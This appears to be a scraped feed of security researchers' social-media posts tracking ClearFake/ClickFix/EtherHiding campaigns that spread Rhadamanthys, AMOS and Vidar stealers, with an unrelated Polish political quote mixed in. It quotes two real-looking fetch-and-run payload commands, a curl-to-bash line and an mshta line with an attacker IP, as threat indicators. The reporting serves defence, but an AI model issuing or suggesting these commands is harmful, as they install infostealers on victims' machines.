@DailyDarkWeb Bullshit! 😤 Another fakenews about a supposed data leak is just noise. This isn't a breach; it's just login data stolen by infostealers and aggregated. Don't spread panic, verify your sources! #FakeNews#Cybersecurity#ScamAlert
@Zaufana3Strona "Nie pozwolę na to, żeby jakakolwiek praca parlamentu podważała zaufanie do jednej z najbardziej doświadczonych polskich firm"
https://t.co/N09rrzCxQi (od 18:05:15)
Useless security advice you need to stop giving: "Don't click suspicious links!"
Links are made to be clicked. Clicking links should be safe. If clicking a link gets your company hacked, it's a security stack issue, not a "train users to not click links" issue.
#ClearFake variant is now spreading #Rhadamanthys Stealer via #Emmenhtal Loader.
cc @plebourhis@sekoia_io
1. ClearFake framework is injected on compromised WordPress and relies on EtherHiding
2. The #ClickFix lure uses a fake Cloudflare Turnstile with unusual web traffic
⬇️
And we have something new. New day new domains, new malware. This time targeted platform is macos and we get #amos#stealer. Still #clickfix and #etherhide.
/bin/bash -c \"$(curl -fsSL https[:]//browser-storage.com/install.sh)\
dropped sample
https://t.co/9IDqW35Nxt
clickfix decoy html https://t.co/9xvf1zUqzD
A new EtherHide technique combined with ClearFake/ClickFix is spreading Vidar malware across ~5k websites! The campaign has been active for ~3 months as of 2024-11-24. #Binance#EtherHide#ClearFake#ClickFix#Malware#IOC#przepisyjoli ;)
https://t.co/adRSzIMcB6
New update in #etherhide#clickfix campaign with #vidar sample but something crashed so let's wait for next update...
2025-02-05 21:15:54,628 - [+] Tx 2025-02-05 20:41:17 Found something else: L>F CLOSED
2025-02-05 21:15:54,732 - [+] Tx 2025-02-05 20:37:23 Found something else: L>F OPEN
2025-02-05 21:15:54,840 - [+] Tx 2025-02-05 20:36:23 mshta command URI: mshta http[:]//80.64.30.238/trip.psd # Microsoft Windows: Fix Internet DNS Service reconnect